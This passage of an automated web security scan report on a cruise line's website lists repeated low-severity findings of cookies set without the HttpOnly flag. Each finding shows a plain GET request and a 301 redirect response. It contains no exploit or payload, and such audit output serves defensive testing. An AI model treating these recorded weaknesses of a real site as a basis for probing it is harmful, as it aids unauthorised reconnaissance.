<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.101. http://www2.ncl.com/destination/canada_new_engl/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/ports/map

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/canada_new_engl/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:47 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:47 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:47 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.102. http://www2.ncl.com/destination/canada_new_engl/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/questions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/canada_new_engl/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:59 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:59 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.103. http://www2.ncl.com/destination/canada_new_engl/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/stories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/canada_new_engl/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:54 GMT
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:54 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:54 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:54 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.104. http://www2.ncl.com/destination/canada_new_engl/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/vacations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/canada_new_engl/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:58 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:58 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.105. http://www2.ncl.com/destination/caribbean/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/excursions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/caribbean/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:57 GMT
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:06:57 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:57 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:57 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.106. http://www2.ncl.com/destination/caribbean/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/hotel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/caribbean/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:59 GMT
Content-Length: 262
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:59 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.107. http://www2.ncl.com/destination/caribbean/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/overview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/caribbean/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:58 GMT
Content-Length: 265
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:06:58 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.108. http://www2.ncl.com/destination/caribbean/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/ports/map

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/caribbean/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:59 GMT
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:00 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:00 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:00 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.109. http://www2.ncl.com/destination/caribbean/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/questions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/caribbean/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:01 GMT
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:01 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.110. http://www2.ncl.com/destination/caribbean/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/stories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/caribbean/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:01 GMT
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:01 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.111. http://www2.ncl.com/destination/caribbean/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/vacations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/caribbean/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:01 GMT
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.112. http://www2.ncl.com/destination/europe/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/excursions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/europe/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:02 GMT
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.113. http://www2.ncl.com/destination/europe/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/hotel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/europe/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:03 GMT
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:03 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:03 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.114. http://www2.ncl.com/destination/europe/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/overview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/europe/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:02 GMT
Content-Length: 262
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.115. http://www2.ncl.com/destination/europe/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/ports/map

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/europe/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:02 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.116. http://www2.ncl.com/destination/europe/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/questions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/europe/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:05 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:05 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:05 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:05 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.117. http://www2.ncl.com/destination/europe/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/stories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/europe/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:04 GMT
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:04 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:04 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:04 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.118. http://www2.ncl.com/destination/europe/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/vacations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/europe/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:09 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:09 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.119. http://www2.ncl.com/destination/hawaii/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/excursions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/hawaii/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:10 GMT
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:10 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.120. http://www2.ncl.com/destination/hawaii/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/hotel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/hawaii/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:13 GMT
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:13 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:13 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:13 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.121. http://www2.ncl.com/destination/hawaii/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/overview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/hawaii/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:09 GMT
Content-Length: 262
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:09 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.122. http://www2.ncl.com/destination/hawaii/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/ports/map

Issue detail

